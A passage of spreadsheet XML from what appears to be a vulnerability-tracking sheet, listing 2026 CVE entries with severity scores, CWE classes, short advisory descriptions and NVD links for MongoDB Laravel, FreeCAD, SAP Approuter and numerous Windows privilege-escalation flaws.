        <is>
          <t>Improper neutralization of special elements in data query logic in the embedded-document relation handling of the MongoDB integration for Laravel can cause a caller-supplied embedded record identifier to be interpreted as a query condition rather than as a literal identifier. An authenticated user who can influence such an identifier may delete all embedded documents in a targeted record or overwrite an embedded document other than the intended target.</t>
        </is>
      </c>
      <c r="M1270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88027</t>
        </is>
      </c>
    </row>
    <row r="1271">
      <c r="A1271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88028</t>
        </is>
      </c>
      <c r="C1271" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1271" s="5" t="inlineStr"/>
      <c r="F1271" s="5" t="inlineStr"/>
      <c r="G1271" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1271" s="5" t="inlineStr"/>
      <c r="I1271" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1271" s="5" t="inlineStr"/>
      <c r="K1271" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1271" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the polymorphic relation handling of the MongoDB integration for Laravel can cause a caller-supplied relation identifier to be interpreted as a query condition rather than as a literal identifier. An authenticated user who can influence a stored relation identifier may cause an affected application to return a document other than the intended relation target.</t>
        </is>
      </c>
      <c r="M1271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88028</t>
        </is>
      </c>
    </row>
    <row r="1272">
      <c r="A1272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34789</t>
        </is>
      </c>
      <c r="C1272" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1272" s="5" t="inlineStr"/>
      <c r="F1272" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1272" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1272" s="5" t="inlineStr"/>
      <c r="I1272" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1272" s="5" t="inlineStr"/>
      <c r="K1272" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1272" s="5" t="inlineStr">
        <is>
          <t>FreeCAD is a free and open-source multiplatform 3D parametric modeler. Prior to 1.1.2, src/App/PropertyPythonObject.cpp in PropertyPythonObject::Restore() passes the attacker-controlled module attribute from serialized PropertyPythonObject XML directly to PyImport_ImportModule() while restoring a crafted FCStd document, which executes module-level Python code, and the legacy pickle branch also imports an attacker-controlled module and invokes its class constructor through PyObject_CallObject(). This issue is fixed in version 1.1.2.</t>
        </is>
      </c>
      <c r="M1272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34789</t>
        </is>
      </c>
    </row>
    <row r="1273">
      <c r="A1273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50349</t>
        </is>
      </c>
      <c r="C1273" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1273" s="5" t="inlineStr"/>
      <c r="F1273" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1273" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1273" s="5" t="inlineStr"/>
      <c r="I1273" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1273" s="5" t="inlineStr"/>
      <c r="K1273" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1273" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50349</t>
        </is>
      </c>
    </row>
    <row r="1274">
      <c r="A1274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58230</t>
        </is>
      </c>
      <c r="C1274" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1274" s="5" t="inlineStr"/>
      <c r="F1274" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1274" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1274" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I1274" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1274" s="5" t="inlineStr"/>
      <c r="K1274" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L1274" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not sufficiently validate certain token content under specific configurations. An unauthenticated attacker could send a specially crafted token to cause sensitive credential material to be sent to an attacker-controlled destination. The attack complexity is high due to non-default preconditions required in the target environment. This results in a high impact on confidentiality and a low impact on integrity and availability.</t>
        </is>
      </c>
      <c r="M1274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58230</t>
        </is>
      </c>
    </row>
    <row r="1275">
      <c r="A1275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62694</t>
        </is>
      </c>
      <c r="C1275" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1275" s="5" t="inlineStr"/>
      <c r="F1275" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1275" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1275" s="5" t="inlineStr"/>
      <c r="I1275" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1275" s="5" t="inlineStr"/>
      <c r="K1275" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1275" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62694</t>
        </is>
      </c>
    </row>
    <row r="1276">
      <c r="A1276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62727</t>
        </is>
      </c>
      <c r="C1276" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1276" s="5" t="inlineStr"/>
      <c r="F1276" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1276" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H127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76" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1276" s="5" t="inlineStr"/>
      <c r="K1276" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L1276" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Telephony Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62727</t>
        </is>
      </c>
    </row>
    <row r="1277">
      <c r="A1277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68824</t>
        </is>
      </c>
      <c r="C1277" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1277" s="5" t="inlineStr"/>
      <c r="F1277" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1277" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1277" s="5" t="inlineStr"/>
      <c r="I1277" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1277" s="5" t="inlineStr"/>
      <c r="K1277" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1277" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68824</t>
        </is>
      </c>
    </row>
    <row r="1278">
      <c r="A1278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68825</t>
        </is>
      </c>
      <c r="C1278" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1278" s="5" t="inlineStr"/>
      <c r="F1278" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1278" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1278" s="5" t="inlineStr"/>
      <c r="I1278" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1278" s="5" t="inlineStr"/>
      <c r="K1278" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1278" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bind Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68825</t>
        </is>
      </c>
    </row>
    <row r="1279">
      <c r="A1279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68837</t>
        </is>
      </c>
      <c r="C1279" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1279" s="5" t="inlineStr"/>
      <c r="F1279" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1279" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1279" s="5" t="inlineStr"/>
      <c r="I1279" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1279" s="5" t="inlineStr"/>
      <c r="K1279" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1279" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68837</t>
        </is>
      </c>
    </row>
    <row r="1280">
      <c r="A1280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68840</t>
        </is>
      </c>
      <c r="C1280" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1280" s="5" t="inlineStr"/>
      <c r="F1280" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1280" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1280" s="5" t="inlineStr"/>
      <c r="I1280" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1280" s="5" t="inlineStr"/>
      <c r="K1280" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1280" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t>
        </is>
      </c>
    </row>
    <row r="1281">
      <c r="A1281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68847</t>
        </is>
      </c>
      <c r="C1281" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1281" s="5" t="inlineStr"/>
      <c r="F1281" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1281" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1281" s="5" t="inlineStr"/>
      <c r="I1281" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1281" s="5" t="inlineStr"/>
      <c r="K1281" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1281" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68847</t>
        </is>
      </c>
    </row>
    <row r="1282">
      <c r="A1282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68884</t>
        </is>
      </c>
      <c r="C1282" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1282" s="5" t="inlineStr"/>
      <c r="F1282" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1282" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1282" s="5" t="inlineStr"/>
      <c r="I1282" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1282" s="5" t="inlineStr"/>
      <c r="K1282" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1282" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68884</t>
        </is>
      </c>
    </row>
    <row r="1283">
      <c r="A1283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68897</t>
        </is>
      </c>
      <c r="C1283" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1283" s="5" t="inlineStr"/>
      <c r="F1283" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1283" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1283" s="5" t="inlineStr"/>
      <c r="I1283" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1283" s="5" t="inlineStr"/>
      <c r="K1283" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1283" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68897</t>
        </is>
      </c>
    </row>
    <row r="1284">
      <c r="A1284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69279</t>
        </is>
      </c>
      <c r="C1284" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1284" s="5" t="inlineStr"/>
      <c r="F1284" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1284" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1284" s="5" t="inlineStr"/>
      <c r="I1284" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1284" s="5" t="inlineStr"/>
      <c r="K1284" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1284" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69279</t>
        </is>
      </c>
    </row>
    <row r="1285">
      <c r="A1285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69280</t>
        </is>
      </c>
      <c r="C1285" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1285" s="5" t="inlineStr"/>
      <c r="F1285" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1285" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1285" s="5" t="inlineStr"/>
      <c r="I1285" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1285" s="5" t="inlineStr"/>
      <c r="K1285" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1285" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69280</t>
        </is>
      </c>
    </row>
    <row r="1286">
      <c r="A1286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69281</t>
        </is>
      </c>
      <c r="C1286" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1286" s="5" t="inlineStr"/>
      <c r="F1286" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1286" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1286" s="5" t="inlineStr"/>
      <c r="I1286" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1286" s="5" t="inlineStr"/>
      <c r="K1286" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1286" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows License Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69281</t>
        </is>
      </c>
    </row>
    <row r="1287">
      <c r="A1287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69287</t>
        </is>
      </c>
      <c r="C1287" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1287" s="5" t="inlineStr"/>
      <c r="F1287" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1287" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1287" s="5" t="inlineStr"/>
      <c r="I1287" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1287" s="5" t="inlineStr"/>
      <c r="K1287" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1287" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69287</t>
        </is>
      </c>
    </row>
    <row r="1288">
      <c r="A1288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69299</t>
        </is>
      </c>
      <c r="C1288" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1288" s="5" t="inlineStr"/>
      <c r="F1288" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1288" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1288" s="5" t="inlineStr"/>
      <c r="I1288" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1288" s="5" t="inlineStr"/>
      <c r="K1288" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1288" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft COM for Windows allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69299</t>
        </is>
      </c>
    </row>
    <row r="1289">
      <c r="A1289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69300</t>
        </is>
      </c>
      <c r="C1289" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1289" s="5" t="inlineStr"/>
      <c r="F1289" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1289" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1289" s="5" t="inlineStr"/>
      <c r="I1289" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1289" s="5" t="inlineStr"/>
      <c r="K1289" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1289" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69300</t>
        </is>
      </c>
    </row>
    <row r="1290">
      <c r="A1290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69309</t>
        </is>
      </c>
      <c r="C1290" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1290" s="5" t="inlineStr"/>
      <c r="F1290" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1290" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1290" s="5" t="inlineStr"/>
      <c r="I1290" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1290" s="5" t="inlineStr"/>
      <c r="K1290" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1290" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69309</t>
        </is>
      </c>
    </row>
    <row r="1291">
      <c r="A1291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69310</t>
        </is>
      </c>
      <c r="C1291" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1291" s="5" t="inlineStr"/>
      <c r="F1291" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1291" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1291" s="5" t="inlineStr"/>
      <c r="I1291" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1291" s="5" t="inlineStr"/>
      <c r="K1291" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1291" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69310</t>
        </is>
      </c>
    </row>
    <row r="1292">
      <c r="A1292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69311</t>
        </is>
      </c>
      <c r="C1292" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1292" s="5" t="inlineStr"/>
      <c r="F1292" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1292" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1292" s="5" t="inlineStr"/>
      <c r="I1292" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1292" s="5" t="inlineStr"/>
      <c r="K1292" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1292" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69311</t>
        </is>
      </c>
    </row>
    <row r="1293">
      <c r="A1293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69319</t>
        </is>
      </c>
      <c r="C1293" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1293" s="5" t="inlineStr"/>
      <c r="F1293" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1293" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1293" s="5" t="inlineStr"/>
      <c r="I1293" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1293" s="5" t="inlineStr"/>
      <c r="K1293" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1293" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t>
        </is>
      </c>
    </row>
    <row r="1294">
      <c r="A1294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69331</t>
        </is>
      </c>
      <c r="C1294" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1294" s="5" t="inlineStr"/>
      <c r="F1294" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1294" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
